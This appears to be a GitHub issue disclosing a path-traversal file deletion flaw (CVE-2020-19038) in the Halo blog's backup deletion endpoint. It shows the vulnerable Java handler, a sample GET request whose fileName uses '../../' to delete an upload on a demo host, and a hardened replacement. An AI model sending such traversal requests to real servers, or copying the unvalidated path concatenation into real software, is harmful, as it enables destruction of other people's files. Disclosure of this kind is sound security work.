I confirm that I have checked (mark [ ] as [x])
[ ]
[x]
I want to request (mark [ ] as [x])
There is an arbitrary file deletion vulnerability in the backup file deletion.
```java
@GetMapping(value = "delBackup")
@ResponseBody
public JsonResult delBackup(@RequestParam("fileName") String fileName,
                            @RequestParam("type") String type) {
    // Both request parameters are concatenated into the path with no validation,
    // so "../" sequences in type or fileName escape the backup directory.
    final String srcPath = System.getProperties().getProperty("user.home")
            + "/halo/backup/" + type + "/" + fileName;
    try {
        FileUtil.del(srcPath);
        return new JsonResult(ResultCodeEnum.SUCCESS.getCode(),
                localeMessageUtil.getMessage("code.admin.common.delete-success"));
    } catch (Exception e) {
        return new JsonResult(ResultCodeEnum.FAIL.getCode(),
                localeMessageUtil.getMessage("code.admin.common.delete-failed"));
    }
}
```
e.g.

```http
GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
Host: demo.halo.run
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://demo.halo.run/admin/backup?type=posts
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO
```
The vulnerability was discovered by Chaitin Tech.
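A hardened variant of the delBackup logic, added here as an example (it is not Halo's own code): the backup root, the allowed set of backup types and any file names it is called with are assumptions, and it uses java.nio.file instead of FileUtil.del so it runs on its own.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Set;

// Added example, not Halo's code: deletes a backup only when the requested name
// resolves to a regular file directly under <backupRoot>/<type>.
public class SafeBackupDeleter {
    // Assumed set of backup categories; anything else is rejected outright.
    private static final Set<String> ALLOWED_TYPES = Set.of("posts", "resources", "databases");
    private final Path backupRoot;

    public SafeBackupDeleter(Path backupRoot) {
        this.backupRoot = backupRoot.toAbsolutePath().normalize();
    }

    /** Returns true if the file was deleted; false if the request was rejected or the file is absent. */
    public boolean delete(String type, String fileName) throws IOException {
        if (!ALLOWED_TYPES.contains(type)) {
            return false;
        }
        // A backup name must be a single path element: no separators, no "." or "..".
        if (fileName == null || fileName.isEmpty() || fileName.contains("/")
                || fileName.contains("\\") || fileName.equals(".") || fileName.equals("..")) {
            return false;
        }
        Path typeDir = backupRoot.resolve(type);
        Path target = typeDir.resolve(fileName).normalize();
        // Defence in depth: even after the name check, the normalized path must stay under typeDir.
        if (!target.startsWith(typeDir)) {
            return false;
        }
        Path real;
        Path realTypeDir;
        try {
            // Follow symlinks so a link placed in the backup directory cannot redirect the delete.
            realTypeDir = typeDir.toRealPath();
            real = target.toRealPath();
        } catch (IOException e) {
            return false; // directory or file does not exist
        }
        if (!real.getParent().equals(realTypeDir) || !Files.isRegularFile(real)) {
            return false;
        }
        return Files.deleteIfExists(real);
    }
}
```

With the traversal name from the request above, delete("posts", "../../upload/...jpg") is rejected at the separator check before any path is built; a legitimate name such as "site.zip" passes through to the real-path and regular-file checks.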
Preparing to release v1, so closing this issue.
CVE-2020-19038 was discovered by Chaitin Tech. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19038